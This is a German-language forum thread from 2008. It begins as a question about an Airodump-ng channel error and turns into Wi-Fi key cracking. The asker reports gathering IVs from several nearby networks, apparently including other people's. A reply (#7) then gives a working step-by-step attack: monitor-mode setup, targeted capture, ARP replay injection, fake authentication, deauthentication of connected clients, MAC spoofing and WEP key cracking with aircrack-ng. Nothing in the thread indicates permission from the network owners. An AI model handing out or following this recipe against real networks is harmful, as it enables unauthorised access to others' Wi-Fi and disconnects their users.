Airodump Fehlermeldung

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von The@Rocker, 17. März 2008 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 17. März 2008
    Hallo Leute,
    Ich habe einen Netgear WG511v2 und einen Wifi-B WLAN Adapter,
    bei beiden kommt bei der Verwendung von Airodump die folgende Fehlermedung:

    "Failed to set the wireless channel, is something wrong with the card? Also make sure you have installed the correct driver."

    An den Peek-Treibern kann es ja nicht liegen, oder ? Denn dort sah die Fehlermeldung anders aus und er hat einen immer gleich auf die Seite geleitet, wo man sich diese runterladen kann.


    Weiß jemand wie ich das umstellen kann, dass Airodump die Channel setzen kann ?
     

  2. Anzeige
    Heute: Deals & Sale mit stark reduzierten Angeboten finden.
  3. #2 18. März 2008
    AW: Airodump Fehlermeldung

    erste frage? airodump unter linux oder windows?
    klau sollte es gehn ein speziellen channel abzuscannen! du musst einfach beim befehl wenn du airodump aufrufst ein "-c 6" (jetz für channel 6) mit eintragen. zB:
    "airodump-ng -w File -c 6 ath0", sollte eig funktionieren!kommt drauf an ob ath0 dein interface is!
    unt6er win solltest du es eig eintellen können beim öffnen des progs! gruß ken123
     
  4. #3 18. März 2008
    AW: Airodump Fehlermeldung

    Also es ist windows...
    Danke schonmal falls mir ne Frage einfällt, werde ich editieren... Habe mein kopf gerade woanders :-D Ich werde das gleich mal probieren...
     
  5. #4 18. März 2008
  6. #5 20. März 2008
    AW: Airodump Fehlermeldung

    Hm.. ja ok, also ich habe das ganze jetzt mal mit dem Wifi-Adapter unter Linux mit dem Whax3.0-Paket gemacht.
    Ich kann die channels jetzt auch abscannen. Airodump und Aireplay funktionieren.

    Nur leider bekomme ich kaum IVs.
    Es gibt nur ein WLAN wo ich einige bekomme, aber auch sehr wenige, bei meinem eigenen z.B. gar keine, obwohl ich ganze viele Pakete empfange. Ich kann auch nicht bei alles WLANs, die ich empfange, mit aireplay Pakete injezieren. Ist das auch normal ?

    naja... also für Aircrack reichen die IVs von dem einen WLAN, von den ich überhaupt welche kriege, nicht aus, denn das sind nur so ca. 20.000 nach ca. 1,5 Stnden suchlauf ^^

    Mache ich da noc hwas falsch, oder ist es normal, dass man nicht von jedem WLAN IVs bekommt?
     
  7. #6 5. April 2008
    AW: Airodump Fehlermeldung

    künstlich die IVs in die höhe treiben geht bisher nur unter linux. unter windows heisst es: warten.
     
  8. #7 10. April 2008
    AW: Airodump Fehlermeldung

    Saug dir die Live CD von Backtrack v3 beta!
    Damit kannst du dann IV's erzeugen und knackst wep keys in minuten!
    Und wenn die card auf einem channel festbleibt dann probier mal
    wlanconfig ath0 destroy
    wlanconfig ath0 create wlandev wifi0 wlanmode monitor (unter linux natürlich)

    und dann den neuen channel mit airodump setzen
    airodump-ng --bssid <mac des aps> -c 11 -w blabladump ath0

    um künstlich ivs zu erzeugen benutzt du dann aireplay
    aireplay-ng --arpreplay -b <mac des aps> -h <mac der station> ath0

    Wenn die Station nicht zum AP verbunden ist dann versuch es damit:
    aireplay-ng --fakeauth -a <mac des aps> -h <mac der station> ath0
    und
    aireplay-ng --deauth -a <mac des aps> -c <mac der station> ath0

    Um deine eigene mac zu ändern benutzt du unter backtrack am besten den macchanger.
    ifconfig ath0 down
    macchanger -m 00:11:22:33:44:55 ath0
    ifconfig ath0 up

    Während du IV's erzeugst kannst du nebenbei auch gleich versuchen den wepkey zu cracken.
    aircrack-ng blabladump.cap

    Backtrack gibt es kostenlos und zwar hier: remote-exploit.org
     

  9. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Airodump Fehlermeldung
  1. [XP] airodump fehlermeldung..

    LeAn , 13. April 2009 , im Forum: Windows
    Antworten:
    2
    Aufrufe:
    553
  2. Airodump #data problem

    -=9=- , 8. August 2012 , im Forum: Linux & BSD
    Antworten:
    8
    Aufrufe:
    2.279
  3. Antworten:
    9
    Aufrufe:
    1.404
  4. Antworten:
    5
    Aufrufe:
    881
  5. Antworten:
    4
    Aufrufe:
    1.871